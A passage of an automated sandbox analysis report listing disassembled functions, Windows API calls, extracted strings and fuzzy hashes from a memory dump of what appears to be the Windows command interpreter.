                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                      • API String ID: 2411632146-3173542853
                                                                      • Opcode ID: 454ea4a685715d16186e9be2c828b7437c3754e976679e3cb8fdbc9a30564bca
                                                                      • Instruction ID: 7ff866de631e94e637987e282ee170993542c3891384ca5bdaed552789a025e1
                                                                      • Opcode Fuzzy Hash: 454ea4a685715d16186e9be2c828b7437c3754e976679e3cb8fdbc9a30564bca
                                                                      • Instruction Fuzzy Hash: 225157B1500704BBEB305F688C0AEABB7FAEF85700F00456DF645A2152DA75EA84CB62
                                                                      Function 00050590 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 181fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,0005B7DB,0000000C,00000004,00000080,00000000), ref: 000505FF
                                                                      • _open_osfhandle.MSVCRT ref: 00050613
                                                                      • _wcsicmp.MSVCRT ref: 00050663
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00050695
                                                                      • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 000506D3
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 000506FB
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00050717
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 0005E89D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                      • String ID: con
                                                                      • API String ID: 58404892-4257191772
                                                                      • Opcode ID: 78a686b70a14bb8780d373c4812f255788f2c4365c0283daa2a784ea1e45ec44
                                                                      • Instruction ID: a3696803809cd4fac2e66c2664181ea209d45e6a77b772c107fd67fda1a775a1
                                                                      • Opcode Fuzzy Hash: 78a686b70a14bb8780d373c4812f255788f2c4365c0283daa2a784ea1e45ec44
                                                                      • Instruction Fuzzy Hash: 9951D770A00204ABFB248B94DC49BBF77F8FB45721F204226FD55E22D0E77999598B62
                                                                      Function 0006C5F2 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0006C62E
                                                                      • memset.MSVCRT ref: 0006C656
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0006C6C7
                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0006C6E6
                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0006C72A
                                                                      • _wcsicmp.MSVCRT ref: 0006C747
                                                                      • _wcsicmp.MSVCRT ref: 0006C76C
                                                                      • _wcsicmp.MSVCRT ref: 0006C794
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 0006C7B3
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 0006C7C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                      • String ID: CSVFS$NTFS$REFS
                                                                      • API String ID: 3510147486-2605508654
                                                                      • Opcode ID: 447a35257a388d1198c68a28f08e99254b3e32a7ba662aaaf4616cb238eb9478
                                                                      • Instruction ID: 69146bb70af0467c5f3977e02e9ce802599a4919679a89a7548833cac47acd0e
                                                                      • Opcode Fuzzy Hash: 447a35257a388d1198c68a28f08e99254b3e32a7ba662aaaf4616cb238eb9478
                                                                      • Instruction Fuzzy Hash: 845141B1A042595AFB20CAA5DC88FAEBBF9EB45344F0400AAE545D2141E738DE84CF25
                                                                      Function 000556C4 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 297COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • longjmp.MSVCRT(00080A70,000000FF,00000000,?,00000001,?,?,?,00055833,?, /D /c",?,?,?,00000000,?), ref: 00061271
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: longjmp
                                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                      • API String ID: 1832741078-366822981
                                                                      • Opcode ID: 9722160089e964ded96c86931cd8229856405f78a8968891ccfb631a2377d635
                                                                      • Instruction ID: 7fd852796e5db030fb50bb46f610ce8b336d1f4cecfd0af45f91e3910cf3762c
                                                                      • Opcode Fuzzy Hash: 9722160089e964ded96c86931cd8229856405f78a8968891ccfb631a2377d635
                                                                      • Instruction Fuzzy Hash: 08A1E374704A08FBCF24DE15C9959EEBBA3FF48396B244015F8028B691CB74DE91CB81
                                                                      Function 00047E93 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 146windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00080AF0,00002000,00000000,00000000,00000000,00000000), ref: 00047ED4
                                                                        • Part of subcall function 0004A62F: wcschr.MSVCRT ref: 0004A635
                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00080AF0,00002000,?), ref: 00047F16
                                                                      • _ultoa.MSVCRT ref: 0005AFC9
                                                                      • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 0005AFDE
                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 0005AFF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                      • String ID: Application$System
                                                                      • API String ID: 3538039442-3455788185
                                                                      • Opcode ID: a9842170fba4c3c068b2c3f92905b84fe08e45527e38f60d8bc2ecd3b98e6062
                                                                      • Instruction ID: b2a42ae65c0db5f5e326cd0cafc79bc7cc9978868f4dbe9d5d93f6b0f3df7b55
                                                                      • Opcode Fuzzy Hash: a9842170fba4c3c068b2c3f92905b84fe08e45527e38f60d8bc2ecd3b98e6062
                                                                      • Instruction Fuzzy Hash: 6E41E2B1740305ABEB249BA4CC89FAF7BA9FB46B41F200139F946DB280DB749D04C756
                                                                      Function 0004E950 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 276COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memsetwcschr$_wcsicmpiswspace
                                                                      • String ID: :.\$=,;$=,;+/[] "
                                                                      • API String ID: 1913572127-843887632
                                                                      • Opcode ID: a3e3135cba3faf0e03d42709f1cd5dadf872348153a42e66a34beded98247619
                                                                      • Instruction ID: bf28a8290012672d2c31ae16fce8443e0cd8c76041bf6cf6a386f067b6a5c5c5
                                                                      • Opcode Fuzzy Hash: a3e3135cba3faf0e03d42709f1cd5dadf872348153a42e66a34beded98247619
                                                                      • Instruction Fuzzy Hash: 59A1E5B0A042949BDF74CB68D884BBE77F1FF44314F1401BAE806A7291D774AD85CB5A
                                                                      Function 00047610 Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00047669
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00047670
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00047686
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0004768D
                                                                      • _wcsicmp.MSVCRT ref: 00047719
                                                                      • _wcsicmp.MSVCRT ref: 0004772B
                                                                      • _wcsicmp.MSVCRT ref: 00047758
                                                                      • _wcsicmp.MSVCRT ref: 0005AA79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap_wcsicmp$AllocProcess
                                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                      • API String ID: 435930816-3086019870
                                                                      • Opcode ID: 0813d3585cad260396f04c6120ae1f7ab240a7575798d531b653d0a4f8e365ed
                                                                      • Instruction ID: b6f2e086f0d4fc28aa165f89900fe6e20d741bb7b383a82de3755754d7de7cb4
                                                                      • Opcode Fuzzy Hash: 0813d3585cad260396f04c6120ae1f7ab240a7575798d531b653d0a4f8e365ed
                                                                      • Instruction Fuzzy Hash: 0E5146B170C6019FF7289F34AC05A2737D4FB49314B64443EE94AD7282EF29D841CB6A
                                                                      Function 0006AEBD Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 266COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0006AF04
                                                                      • memset.MSVCRT ref: 0006AF2E
                                                                      • memset.MSVCRT ref: 0006AF58
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,0004250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 0006B08B
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 0006B095
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 0006B0AA
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0006B1DA
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0006B1F2
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0006B20A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                      • String ID: %04X-%04X
                                                                      • API String ID: 2748242238-1126166780
                                                                      • Opcode ID: 771b27c00a32a2c3fb04b6d15a446d149742bbcf6d7a2e248971db0987874eb2
                                                                      • Instruction ID: f8aed3bdf79586401928afbb78486a5e72db7226f5bcd042ca53f0354e2b65a1
                                                                      • Opcode Fuzzy Hash: 771b27c00a32a2c3fb04b6d15a446d149742bbcf6d7a2e248971db0987874eb2
                                                                      • Instruction Fuzzy Hash: 9791A0B1A002289BEB64DB24CC95BEA77FAEF15304F4005E9E509E7141EB349FC48F95
                                                                      Function 0004BC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$iswspace
                                                                      • String ID: =,;
                                                                      • API String ID: 3458554142-1539845467
                                                                      • Opcode ID: ac1a9ef2ec964f048a4dd515df60eb3333e0db4e709eaa5938164f20261b5c1f
                                                                      • Instruction ID: b5ab1f778bdf5d76f993618e9aafd128bf21bc87d14224bcc64f80af088ff340
                                                                      • Opcode Fuzzy Hash: ac1a9ef2ec964f048a4dd515df60eb3333e0db4e709eaa5938164f20261b5c1f
                                                                      • Instruction Fuzzy Hash: CC81AFF4A002158BEB709F65CC457BA72F5AF50305F1444BAED8AA7241FB74CD88CB69
                                                                      Function 00053065 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                      • String ID: +-~!
                                                                      • API String ID: 2191331888-2604099254
                                                                      • Opcode ID: 4a9913c82c39f42f12580bede3e36355076b4ffc30f6fb7b0354d4f853eb3c19
                                                                      • Instruction ID: 97662c6aa75b01413c00b825d8badbef3fd74ab7905deadf6f1aac44061f867c
                                                                      • Opcode Fuzzy Hash: 4a9913c82c39f42f12580bede3e36355076b4ffc30f6fb7b0354d4f853eb3c19
                                                                      • Instruction Fuzzy Hash: 7E518B71500609EBDB10DF64D8459EF37A9EF063A2B108526FD069B150EBB8DF08DBA1
                                                                      Function 00067220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • towupper.MSVCRT ref: 00067277
                                                                      • iswalpha.MSVCRT ref: 000672AA
                                                                      • towupper.MSVCRT ref: 000672BD
                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 000672EF
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00067304
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00067311
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                      • String ID: $%04X-%04X$\
                                                                      • API String ID: 4001382275-467840296
                                                                      • Opcode ID: 6cceab324dd50cfe5303f7fe14823f9a14ebe0a79ac5a6d07cc0ef3dad1003c3
                                                                      • Instruction ID: 6cecf18448bde4c9d99e01a8748ec2080e5b8f869c9e58dbfa061ff7927a948d
                                                                      • Opcode Fuzzy Hash: 6cceab324dd50cfe5303f7fe14823f9a14ebe0a79ac5a6d07cc0ef3dad1003c3
                                                                      • Instruction Fuzzy Hash: 59410CB1204310AAE7206FA59C06EBB73EDEF85B14F14442EF989C6181EB74DA44D7A6
                                                                      Function 00062D1F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00063877), ref: 00062D31
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSingleWait
                                                                      • String ID: wil
                                                                      • API String ID: 24740636-1589926490
                                                                      • Opcode ID: 51698bc939be9db8712ec652b8c3e80fe47225248189edd95d1f8800172290bc
                                                                      • Instruction ID: 613ad552fc5cde4dce700921494c7f99958f582b5b1e384d2701a7d57437f81c
                                                                      • Opcode Fuzzy Hash: 51698bc939be9db8712ec652b8c3e80fe47225248189edd95d1f8800172290bc
                                                                      • Instruction Fuzzy Hash: 61318030304A05ABFB309B64CC88BAF36AFEF41361F604036F942D6691D779DD5197A2
                                                                      Function 00055271 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00055294
                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 000552A4
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00061036
                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00061048
                                                                      • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00061064
                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00061073
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                      • String ID: :$\
                                                                      • API String ID: 3961617410-1166558509
                                                                      • Opcode ID: b4bf9c868b09f756f9b7a946c07a304e48c647078e63642cc09317232a91f30b
                                                                      • Instruction ID: 0584e8b79a13cf50a619fbdeaa8d462e20784abc23be771ac204ddd91e3ceec0
                                                                      • Opcode Fuzzy Hash: b4bf9c868b09f756f9b7a946c07a304e48c647078e63642cc09317232a91f30b
                                                                      • Instruction Fuzzy Hash: 0811C631A00614ABBB205B748C589BF77F9FF47773B140119EC12D2190EB788D89ABA2
                                                                      Function 0005161D Relevance: 15.4, APIs: 10, Instructions: 419COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00051665
                                                                      • memset.MSVCRT ref: 00051689
                                                                      • memset.MSVCRT ref: 000516AD
                                                                      • memset.MSVCRT ref: 000516D1
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 000517CF
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 000517E9
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00051801
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00051813
                                                                        • Part of subcall function 0005260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00051775,-00000001,-00000001,-00000001,-00000001), ref: 00052650
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$BufferConsoleInfoScreen
                                                                      • String ID:
                                                                      • API String ID: 1034426908-0
                                                                      • Opcode ID: 4f49aa27e3574827196be880fd455391005895649b66bae313854443c24dc3a8
                                                                      • Instruction ID: 03d6e4f2336c20ca1503f5bd2135e6e87ad00031917eb565e829cf5d9ca87a18
                                                                      • Opcode Fuzzy Hash: 4f49aa27e3574827196be880fd455391005895649b66bae313854443c24dc3a8
                                                                      • Instruction Fuzzy Hash: 16F15CB1A042599BDB68DB24CC85BEABBF5FF08305F1441A9E84997241EB34DE84CF94
                                                                      Function 000645F9 Relevance: 15.2, APIs: 10, Instructions: 150fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00069E02,?,?,00069E02), ref: 00064618
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,00069E02), ref: 00064637
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0007A7F0,00069E02,?,00000000,?,00069E02), ref: 00064646
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,00069E02), ref: 00064653
                                                                      • memcmp.MSVCRT(0007A7F0,000434F8,00000003), ref: 00064693
                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00069E02,00000000,?,00069E02,?,00069E02), ref: 00064720
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00069E02,00000000,00000000,?,00069E02), ref: 00064742
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,00069E02), ref: 0006474F
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0007A7F1,00000001,?,00000000,?,00069E02), ref: 00064764
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,00069E02), ref: 00064771
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
